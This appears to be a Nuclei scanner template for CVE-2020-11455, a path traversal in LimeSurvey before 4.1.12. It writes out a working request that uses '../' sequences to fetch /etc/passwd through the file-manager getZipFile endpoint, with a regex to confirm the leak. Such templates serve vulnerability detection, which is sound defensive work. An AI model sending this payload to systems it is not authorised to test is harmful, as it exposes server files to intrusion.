33 lines
839 B
YAML
33 lines
839 B
YAML
id: CVE-2020-11455
|
|
|
|
info:
|
|
name: LimeSurvey 4.1.11 - Path Traversal
|
|
author: daffainfo
|
|
severity: medium
|
|
description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/48297
|
|
- https://www.cvedetails.com/cve/CVE-2020-11455
|
|
tags: cve,cve2020,lfi
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.30
|
|
cve-id: CVE-2020-11455
|
|
cwe-id: CWE-22
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|